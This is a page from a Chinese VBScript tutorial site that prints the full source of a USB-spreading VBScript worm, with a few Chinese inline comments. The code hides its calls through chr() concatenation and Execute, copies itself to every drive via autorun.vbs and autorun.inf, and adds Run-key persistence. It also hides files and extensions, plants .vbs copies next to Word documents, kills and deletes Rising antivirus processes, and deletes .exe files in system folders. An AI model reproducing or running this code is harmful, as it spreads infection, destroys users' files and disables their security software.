当前位置: 首页 > 图文教程 > 脚本技术 > VBScript > vbs病毒源文件

VBScript
用vbs检索在运行对话框中键入的一系列命令的代码
编写可以打开文本文件并打乱在该文件中所找到的单词顺序的vbs脚本
在 HTA 中暂停脚本的方法
运行脚本之前,如何确定计算机上的默认脚本宿主的代码
用vbs实现删除名称中有撇号的文件夹
用vbs将输出内容写到屏幕以覆盖当前屏幕上的内容的方法
用vbs实现配置无人登录计算机时使用的屏幕保护程序
用vbs更改 Internet Explorer 的标题栏
用vbs读取文本文件的最后一行
用vbs实现重新启动 Internet Explorer
用vbs实现禁用服务
用vbs确定计算机是否有 USB 2.0 端口的代码
用vbs列出注册表中 Run 项中的所有项目
用vbs将名称截断以使其最多包含 16 个字符的代码
用vbs将本地文件替换为在文件服务器上找到的新版本
用vbs确定脚本正在哪一个帐户下运行
用vbs确定可移动驱动器的连接时间
用vbs记录屏幕保护程序的开始时间和结束时间
用vbs计算某个词在日志文件中的出现次数
vbs病毒的简单例子源代码解析

VBScript 中的 vbs病毒源文件


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-11   浏览: 54 ::
收藏到网摘: n/a

rem vbs.rhl
Dim fs,r,ss,w,reg,regpath,dvbs
ddd="Set fs =" &chr(67) & "reate" & "Obj" & chr(101) & "c" & chr(116) & chr(40) & chr(34) & "Scrip" & chr(116) & "ing.File" & chr(83) & "yste" &chr(109) & chr(79) & "bject" & chr(34) & chr(41)
Execute ddd
rrr="set r =" &chr(119) & "scri" & "pt." &chr(67) & "reate" & "Obj" & chr(101) & "c" & chr(116) & chr(40) & chr(34) & chr(119) & "scri" & "pt." &chr(115) & "he" & chr(108) & chr(108) & chr(34) & chr(41)
Execute rrr
sss="fs." & chr(103) &"etfil" & chr(101) & chr(40) &chr(119) & "scri" & "pt." & "scri" & chr(112) & "tfull" &chr(110) & "ame" & chr(41)
ttt="set dvbs =" & sss
Execute ttt
r.run (fs.GetSpecialFolder(0)&"\explorer.exe .\")
main()
On Error Resume Next
sub main()
regtime()
finddrive()
countdrive(ss)
regwrite()
ganranfile(ss)
xunhuan()
end sub
Function finddrive()
if dvbs.name="USBDRIVE.dll" then
regwrite()
ganrandisk()
end if
if dvbs.name<>"autorun.vbs" and dvbs.name<>"USBDRIVE.dll" then
regwrite()
dvbs.delete(true)
end if
ss=Trim("")
Set dc = fs.Drives
For Each d In dc
If d.DriveType = 1 or d.DriveType= 2 and d.IsReady Then
ss = ss & d.DriveLetter
end if
Next
ss = StrReverse(LCase(Trim(ss)))
end Function
Function countdrive(ss)
On Error Resume Next
dim x
For i = 1 To Len(ss)
x = Mid(ss, i, 1)
if x="" then
x=Mid(ss, 1, 1)
i=1
end if
Set w = fs.GetDrive(x)
ganrandiskroot()
Next
end Function
Function ganrandiskroot()
dim c,s,f,vbc,ts,runreg
On Error Resume Next
If w.DriveType=2 or w.DriveType=1 and w.IsReady Then
If fs.FileExists(fs.GetSpecialFolder(1) & "\USBDRIVE.dll") Then
else
fff=sss & ".copy(" & chr(34) & fs.GetSpecialFolder(1) & "\USBDRIVE.dll" &chr(34) & ")"
Execute fff
If fs.FileExists(fs.GetSpecialFolder(1) & "\USBDRIVE.dll") Then
else
fff=sss & ".copy(" & chr(34) & "D:\System Volume Information\USBDRIVE.dll" &chr(34) & ")"
Execute fff
if fs.FileExists("D:\System Volume Information\USBDRIVE.dll") Then
Set ts = fs.CreateTextFile(w.DriveLetter & ":\vbs.reg", true)
ts.WriteLine "Windows Registry Editor Version 5.00"
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34)
ts.close
Set f = fs.GetFile(w.DriveLetter & ":\vbs.reg")
f.attributes=f.attributes+7
Set ts = fs.CreateTextFile(w.DriveLetter & ":\doc.reg",true)
ts.WriteLine "Windows Registry Editor Version 5.00"
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"Microsoft Word 文档"& chr(34)
ts.close
Set f = fs.GetFile(w.DriveLetter & ":\doc.reg")
f.attributes=f.attributes+7
end if
end if
end if
If fs.FileExists(w.DriveLetter & ":\autorun.vbs") Then
Set c = fs.opentextfile(w.DriveLetter & ":\autorun.vbs", 1)
vbc = c.readall
If InStr(vbc,"vbs.rhl") <> 0 Then
c.Close
Else
c.Close
Set c = fs.GetFile(w.DriveLetter & ":\autorun.vbs")
c.delete(true)
fff=sss & ".copy(" & chr(34) & w.DriveLetter & ":\autorun.vbs" &chr(34) & ")"
Execute fff
s=Array("2007总结病毒","这是病毒","违纪病毒","检查病毒","黑名单病毒","没有发出的病毒","恋爱的病毒(病毒)")
Randomize
i= Int((6 * Rnd) + 1)
fff=sss & ".copy(" & chr(34) & w.DriveLetter & ":\" & s(i) & ".vbs" &chr(34) & ")"
Execute fff
Set b = fs.GetFile(w.DriveLetter & ":\" & s(i) & ".vbs")
b.attributes=b.attributes-b.attributes
Set c = fs.GetFile(w.DriveLetter & ":\autorun.vbs")
c.attributes=c.attributes+7
If fs.FileExists(w.DriveLetter & ":\vbs.reg") or fs.FileExists(w.DriveLetter & ":\doc.reg") Then
else
if w.DriveLetter="C" then
Set ts = fs.CreateTextFile(fs.GetSpecialFolder(1) & "\vbs.reg", true)
ts.WriteLine "Windows Registry Editor Version 5.00"
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34)
ts.close
Set f = fs.GetFile(fs.GetSpecialFolder(1) & "\vbs.reg")
f.attributes=f.attributes+7
Set ts = fs.CreateTextFile(fs.GetSpecialFolder(1) & "\doc.reg")
ts.WriteLine "Windows Registry Editor Version 5.00"
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"Microsoft Word 文档"& chr(34)
ts.close
Set f = fs.GetFile(fs.GetSpecialFolder(1) & "\doc.reg")
f.attributes=f.attributes+7
else
Set ts = fs.CreateTextFile(w.DriveLetter & ":\vbs.reg",true)
ts.WriteLine "Windows Registry Editor Version 5.00"
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34)
ts.close
Set f = fs.GetFile(w.DriveLetter & ":\vbs.reg")
f.attributes=f.attributes+7
Set ts = fs.CreateTextFile(w.DriveLetter & ":\doc.reg",true)
ts.WriteLine "Windows Registry Editor Version 5.00"
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"Microsoft Word 文档"& chr(34)
ts.close
Set f = fs.GetFile(w.DriveLetter & ":\doc.reg")
f.attributes=f.attributes+7
end if
end if
end if
else
fff=sss & ".copy(" & chr(34) & w.DriveLetter & ":\autorun.vbs" &chr(34) & ")"
Execute fff
s=Array("检查病毒","2007总结病毒","违纪病毒","这是病毒","黑名单","没有发出的病毒","恋爱的病毒(病毒)")
Randomize
i= Int((6 * Rnd) + 1)
fff=sss & ".copy(" & chr(34) & w.DriveLetter & ":\" & s(i) & ".vbs" &chr(34) & ")"
Execute fff
Set b = fs.GetFile(w.DriveLetter & ":\" & s(i) & ".vbs")
b.attributes=b.attributes-b.attributes
Set c = fs.GetFile(w.DriveLetter & ":\autorun.vbs")
c.attributes=c.attributes+7
If fs.FileExists(w.DriveLetter & ":\vbs.reg") or fs.FileExists(w.DriveLetter & ":\doc.reg") Then
else
if w.DriveLetter="C" then
Set ts = fs.CreateTextFile(fs.GetSpecialFolder(1) & "\vbs.reg", true)
ts.WriteLine "Windows Registry Editor Version 5.00"
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34)
ts.close
Set f = fs.GetFile(fs.GetSpecialFolder(1) & "\vbs.reg")
f.attributes=f.attributes+7
Set ts = fs.CreateTextFile(fs.GetSpecialFolder(1) & "\doc.reg")
ts.WriteLine "Windows Registry Editor Version 5.00"
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"Microsoft Word 文档"& chr(34)
ts.close
Set f = fs.GetFile(fs.GetSpecialFolder(1) & "\doc.reg")
f.attributes=f.attributes+7
else
Set ts = fs.CreateTextFile(w.DriveLetter & ":\vbs.reg", true)
ts.WriteLine "Windows Registry Editor Version 5.00"
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34)
ts.close
Set f = fs.GetFile(w.DriveLetter & ":\vbs.reg")
f.attributes=f.attributes+7
Set ts = fs.CreateTextFile(w.DriveLetter & ":\doc.reg",true)
ts.WriteLine "Windows Registry Editor Version 5.00"
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"Microsoft Word 文档"& chr(34)
ts.close
Set f = fs.GetFile(w.DriveLetter & ":\doc.reg")
f.attributes=f.attributes+7
end if
end if
end if
If fs.FileExists(w.DriveLetter & ":\autorun.inf") Then
Set c = fs.opentextfile(w.DriveLetter & ":\autorun.inf", 1)
vbc = c.readall
If InStr(vbc,"WScript.exe .\autorun.vbs") <> 0 Then
c.Close
Else
Set f = fs.GetFile(w.DriveLetter & ":\autorun.inf")
f.attributes=f.attributes-f.attributes
Set ts = f.OpenAsTextStream(2,-2)
ts.WriteLine "[AutoRun]"
ts.WriteLine "open= "
ts.WriteLine ""
ts.WriteLine "shell\open=打开(&O) "
ts.WriteLine "shell\open\Command=WScript.exe .\autorun.vbs"
ts.WriteLine "shell\open\Default=1 "
ts.close
f.attributes=f.attributes+7
end if
else
Set ts = fs.CreateTextFile(w.DriveLetter & ":\autorun.inf",true)
ts.WriteLine "[AutoRun]"
ts.WriteLine "open= "
ts.WriteLine ""
ts.WriteLine "shell\open=打开(&O) "
ts.WriteLine "shell\open\Command=WScript.exe .\autorun.vbs"
ts.WriteLine "shell\open\Default=1"
ts.close
Set f = fs.GetFile(w.DriveLetter & ":\autorun.inf")
f.attributes=f.attributes+7
End If
end if
end Function
Function regwrite()
On Error Resume Next
dim s
a1="HKE" & "Y_CUR" & "RENT_US" & "ER\Soft" & "ware\Mi" & "croso" & "ft\Win" & "dows\Cur" & "rentV" & "ersion\Exp" & "lorer\Ad" & "vanced\" (a1= HKEY_CURRENT_USER\Software\Microso ft\Windows\CurrentVersion\Explorer\Advanced\
a2="HK"&"EY_CLAS"&"SES_RO" & "OT\DLL" & "File\" (a2=HKEY_CLASSES_ROOT\DLLFile)
a3="HKEY" & "_LOCA" & "L_MACH" & "INE\SOFT" & "WARE\Mi" & "cros" & "oft\Win" & "dows\Cur" & "rentVer" & "sion\poli" & "cies\Expl" & "orer\NoDr" & "iveTypeAutoRun"
(a3=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveTypeAutoRun)
a4="HKE" & "Y_CURR" & "ENT_USE" & "R\Softw" & "are\Micr" & "osoft\Wi" & "ndows\Cur" & "rentVersi" & "on\Polici" & "es\Explor" & "er\NoDriveT" & "ypeAutoRun"
(a4=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun)
a5="HK" & "EY_LO" & "CAL_MA" & "CHINE\Sof" & "tware\Mi" & "croso" & "ft\Wind" & "ows\Curre" & "ntVersi" & "on\Ru" & "n\USBDR" & "IVE.dll"
(a5=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\USBDRIVE.dll)
a6="R.Re" & "gWri" & chr(116) & "e" (a6=R.RegWrichr(116) e)
a7="HKE" & "Y_CLAS" & "SES_ROO" & "T\VBSF" & "ile\Defau" & "ltIcon\"
(a7=HKEY_CLASSES_ROOT\VBSFile\DefaultIcon)
set s=fs.GetDrive(fs.GetDriveName(dvbs.path))
scandoc(fs.GetSpecialFolder(0) & "\Installer")
if reg="wordicon.exe" then
if s="C:" then
if fs.FileExists("D:\System Volume Information\USBDRIVE.dll") Then
r.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & "D:\System Volume Information\doc.reg")
else
r.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & fs.GetSpecialFolder(1) & "\doc.reg")
end if
else
if fs.FileExists("D:\System Volume Information\USBDRIVE.dll") Then
r.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & "D:\System Volume Information\doc.reg")
else
r.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & s.DriveLetter & ":\doc.reg")
end if
end if
ppp=a6&Space(2)&chr(34) & a7 & chr(34)&"," &chr(34)®path & ",1"&chr(34)
Execute ppp
else
if s="C:" then
if fs.FileExists("D:\System Volume Information\USBDRIVE.dll") Then
r.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & "D:\System Volume Information\vbs.reg")
else
r.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & fs.GetSpecialFolder(1) & "\vbs.reg")
end if
else
if fs.FileExists("D:\System Volume Information\USBDRIVE.dll") Then
r.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & "D:\System Volume Information\vbs.reg")
else
r.run(fs.GetSpecialFolder(1) & "\dllcache\regedit.exe /s" & Space(3) & s.DriveLetter & ":\vbs.reg")
end if
end if
ppp=a6&Space(2)&chr(34) & a7 & chr(34)&"," &chr(34)&fs.GetSpecialFolder(1) & "\shell32.dll,1"&chr(34)
Execute ppp
end if
ppp=a6&Space(2)&chr(34) & a1 & "ShowSuperHidden" &chr(34)& "," & "0," & chr(34)&"REG_DWORD"&chr(34)
Execute ppp
ppp=a6&Space(2)&chr(34) & a1 & "HideFileExt" &chr(34)& "," & "1," & chr(34)&"REG_DWORD"&chr(34)
Execute ppp
ppp=a6&Space(2)&chr(34) & a1 & "Hidden" &chr(34)& "," & "0," & chr(34)&"REG_DWORD"&chr(34)
Execute ppp
ppp=a6&Space(2)&chr(34) & a2 & "ScriptEngine\" &chr(34)& "," & chr(34)&"VBScript" & chr(34)
Execute ppp
ppp=a6&Space(2)&chr(34) & a2 & "ScriptHostEncode\" &chr(34)& "," & chr(34)&"{85131631-480C-11D2-B1F9-00C04F86C324}" & chr(34)
Execute ppp
ppp=a6&Space(1)&chr(34) & a2 & "Shell\Open\Command\" &chr(34)& "," & chr(34)&fs.GetSpecialFolder(1) &"\Wscript.exe" &Space(1)& chr(34) &chr(34) &"%1"&chr(34) & chr(34) &Space(1)& "%*" & chr(34)
Execute ppp
ppp=a6&Space(2)&chr(34) & a2 & "ShellEx\PropertySheetHandlers\WSHProps\" &chr(34)& "," & chr(34)&"{60254CA5-953B-11CF-8C96-00AA00B8708C}" & chr(34)
Execute ppp
ppp=a6&Space(2)&chr(34) & a3 & chr(34)&"," & "0," & chr(34)&"REG_DWORD"&chr(34)
Execute ppp
ppp=a6&Space(2)&chr(34) & a4 & chr(34)&"," & "0," & chr(34)&"REG_DWORD"&chr(34)
Execute ppp
if fs.FileExists("D:\System Volume Information\USBDRIVE.dll") Then
ppp=a6&Space(2)&chr(34) & a5 &chr(34)& "," & chr(34)& "D:\System Volume Information" & "\USBDR" & "IVE.dll" & chr(34)
Execute ppp
else
ppp=a6&Space(2)&chr(34) & a5 &chr(34)& "," & chr(34)&fs.GetSpecialFolder(1)&"\USBDR" & "IVE.dll" & chr(34)
Execute ppp
end if
if day(date())="27" then (27号报告错误)
msgbox "小样!你的杀毐软件该升级了,磁盘已被格式化"
End If
end Function
Function scandoc(a) (定义子函数)
On Error Resume Next (出错不报告)
dim files,file,subfolder,folder_
set folder_=fs.getfolder(a)
set files=folder_.files
for each file in files (for each。。。next 对数组或集合中的每个元素重复执行一组语句)
if file.name ="wordicon.exe" then
reg=file.name
regpath=file.path
exit Function
end if
next (for each 的next)
set subfolders=folder_.subfolders (set 是一个赋值语句)
for each subfolder in subfolders
scandoc(subfolder)
next
end Function (结束子程序的定义)
Function regtime() (定义一个子程序添加注册表,结束瑞星)
a6="R.Re" & "gWri" & chr(116) & "e" (a6= R.RegWri chr(116)e chr(116)是值)
a8="HKE"&"Y_CUR" & "RENT_US" & "ER\Soft" & "ware\Micr" & "osoft\Win" & "dows Scr" &"iptingHo"&"st\Settin"&"gs\Timeou (a8=注册表HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout)
ppp=a6&Space(2)&chr(34) & a8 &chr(34)& "," & "0," & chr(34)&"REG_DWORD"&chr(34)
Execute ppp (对指定的字符串执行正则表达式搜索)
dim NameorPID
kill=Array("RavMon.exe","RavTask.exe","RavStub.exe","RavMond.exe","RsAgent.exe")
for i=0 to 4
KillProcess(kill(i)) (结束4个瑞星程序)
next
end Function (结束这个子程序)
Function ganranfile(aa) (定义一个子程序)
On Error Resume Next (出错不报告)
dim x
For i = 1 To Len(aa) (len函数 返回字符串内字符的数目,或是存储一变量所需的字节数)
x = Mid(aa, i, 1) (mid函数 从字符串中返回指定数目的字符。这里是一个个返回给X)
if x="" then
x=Mid(aa, 1, 1)
i=1
end if
Set x = fs.GetDrive(x)
if x.IsReady then
scan(x)
else
xunhuan()
end if
Next
end Function (结束本子程序,作用不明)
Function scan(x) (定义子程序 scan(a) )
On Error Resume Next ( 出错不报告 )
dim files,file,subfolder,folder_
set folder_=fs.getfolder(x)
set files=folder_.files
for each file in files
s=file.path
ext=fs.GetExtensionName(file)
ext=lcase(ext) ( lcase函数 返回字符串的小写形式)
if ext="doc" then
fff=sss & ".copy("&chr(34) & mid(s,1,len(s)-3) & "vbs" &chr(34) & ")" (fff是sss.copy加几个字符
怀疑这个几个字符组成一个文件名)
Execute fff
end if
next
set subfolders=folder_.subfolders
for each subfolder in subfolders
scan(subfolder)
next
end Function
Function ganrandisk()
On Error Resume Next
regwrite()
dim doc, d, s, coun,w,h,oo
Set doc = fs.Drives
for each k in doc
if k.IsReady then
h=h & k.DriveLetter
end if
next
t1=len(Trim(h))
coun=doc.count
do while coun>0
oo=h & w
clearinfo(oo)
wscript.sleep 50
Set d = fs.Drives
if d.count>coun then
for each k in d
if k.IsReady then
s=s & k.DriveLetter
end if
next
coun=d.count
t= StrReverse(LCase(Trim(s)))
w=mid(t,1,abs(len(t)-t1))
countdrive(w)
ganranfile(w)
s=trim("")
t1=len(t)
end if
if d.count<coun then
for each k in d
if k.IsReady then
s=s & k.DriveLetter
end if
next
coun=d.count
t= StrReverse(LCase(Trim(s)))
s=trim("")
t1=len(t)
end if
loop
end Function
Function xunhuan()
On Error Resume Next
dim sfo
set sfo=fs.GetDrive(fs.GetDriveName(dvbs.path))
if dvbs.name="autorun.vbs" or dvbs.name="USBDRIVE.dll" then
if sfo.DriveType=2 then
ganrandisk()
else
wscript.quit
end if
else
dvbs.delete(true)
end if
end Function
Function clearinfo(oo)
On Error Resume Next
dim dc,z
oo =LCase(Trim(oo))
For m = 1 To Len(oo)
z = Mid(oo, m, 1)
Set z = fs.GetDrive(z)
findinf(z)
v=Array(z.DriveLetter & ":\recycled",z.DriveLetter & ":\System Volume Information")
for i= 0 to 1
scanexe(v(i))
next
next
vir=array(fs.GetSpecialFolder(1)& "\recycled",fs.GetSpecialFolder(2),fs.GetSpecialFolder(0)&"\system")
for i=0 to 2
scanexe(vir(i))
next
end Function
Function scanexe(a)
wscript.sleep 100
On Error Resume Next
dim files,file,folder_
if fs.FolderExists(a) then
set folder_=fs.getfolder(a)
set files=folder_.files
for each file in files
ext=fs.GetExtensionName(file)
ext=lcase(ext)
if ext="exe" then
Set f = fs.GetFile(file)
f.delete(true)
end if
next
set subfolders=folder_.subfolders
for each subfolder in subfolders
scanexe(subfolder)
next
end if
end Function
Function findinf(z)
On Error Resume Next
If fs.FileExists(fs.GetSpecialFolder(1) & "\USBDRIVE.dll") Then
else
fff=sss & ".copy(" & chr(34) & fs.GetSpecialFolder(1) & "\USBDRIVE.dll" &chr(34) & ")"
Execute fff
If fs.FileExists(fs.GetSpecialFolder(1) & "\USBDRIVE.dll") Then
else
ppp=a6&Space(2)&chr(34) & a5 &chr(34)& "," & chr(34)& "D:\System Volume Information" & "\USBDR" & "IVE.dll" & chr(34)
Execute ppp
end if
end if
If fs.FileExists(z.DriveLetter & ":\autorun.vbs") Then
else
fff=sss & ".copy(" & chr(34) & z.DriveLetter & ":\autorun.vbs" &chr(34) & ")"
Execute fff
Set f = fs.GetFile(z.DriveLetter & ":\autorun.vbs")
f.attributes=f.attributes+7
end if
If fs.FileExists(z.DriveLetter & ":\autorun.inf") Then
Set c = fs.opentextfile(z.DriveLetter & ":\autorun.inf", 1)
vbc = c.readall
If InStr(vbc,"WScript.exe .\autorun.vbs") <> 0 Then
c.Close
Else
Set f = fs.GetFile(z.DriveLetter & ":\autorun.inf")
f.attributes=f.attributes-f.attributes
Set ts = f.OpenAsTextStream(2,-2)
ts.WriteLine "[AutoRun]" (以下建立自动播放文件)
ts.WriteLine "open= "
ts.WriteLine ""
ts.WriteLine "shell\open=打开(&O) "
ts.WriteLine "shell\open\Command=WScript.exe .\autorun.vbs"
ts.WriteLine "shell\open\Default=1 "
ts.close
f.attributes=f.attributes+7
end if
else
Set ts = fs.CreateTextFile(z.DriveLetter & ":\autorun.inf",true)
ts.WriteLine "[AutoRun]"
ts.WriteLine "open= "
ts.WriteLine ""
ts.WriteLine "shell\open=打开(&O) "
ts.WriteLine "shell\open\Command=WScript.exe .\autorun.vbs"
ts.WriteLine "shell\open\Default=1"
ts.close
Set f = fs.GetFile(z.DriveLetter & ":\autorun.inf")
f.attributes=f.attributes+7
End If
if fs.FileExists(z.DriveLetter & ":\vbs.reg") then
else
Set ts = fs.CreateTextFile(z.DriveLetter & ":\vbs.reg", true)
ts.WriteLine "Windows Registry Editor Version 5.00"
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34)
ts.close
Set f = fs.GetFile(z.DriveLetter & ":\vbs.reg")
f.attributes=f.attributes+7
end if
if fs.FileExists(z.DriveLetter & ":\doc.reg") then
else
Set ts = fs.CreateTextFile(z.DriveLetter & ":\doc.reg",true)
ts.WriteLine "Windows Registry Editor Version 5.00"
ts.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"
ts.WriteLine chr(34) & chr(64) & "C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"Microsoft Word 文档"& chr(34)
ts.close
Set f = fs.GetFile(z.DriveLetter & ":\doc.reg")
f.attributes=f.attributes+7
end if
end Function
Function KillProcess(NameorPID)
On Error Resume Next
Dim oWMI, oProcs, oProc, strSQL
KillProcess = False
strSQL = "SELECT * FROM Win32_Process"
If NameOrPID <> "" Then
If IsNumeric(NameOrPID) Then
strSQL = strSQL & " WHERE Handle = '" & NameorPID & "'"
Else
strSQL = strSQL & " WHERE Name = '" & NameorPID & "'"
End If
End If
Set oWMI = GetObject("winmgmts:\\.\root\cimv2")
Set oProcs = oWMI.ExecQuery(strSQL)
For Each oProc In oProcs
If IsNumeric(NameOrPID) Then
oProc.Terminate
KillProcess = True
Else
oProc.Terminate
if day(date())="27" then
set killfile=fs.getfile( oProc.ExecutablePath)
killfile.delete(true)
End If
end if
Next
Set oProc = Nothing
Set oProcs = Nothing
Set oWMI = Nothing
End Function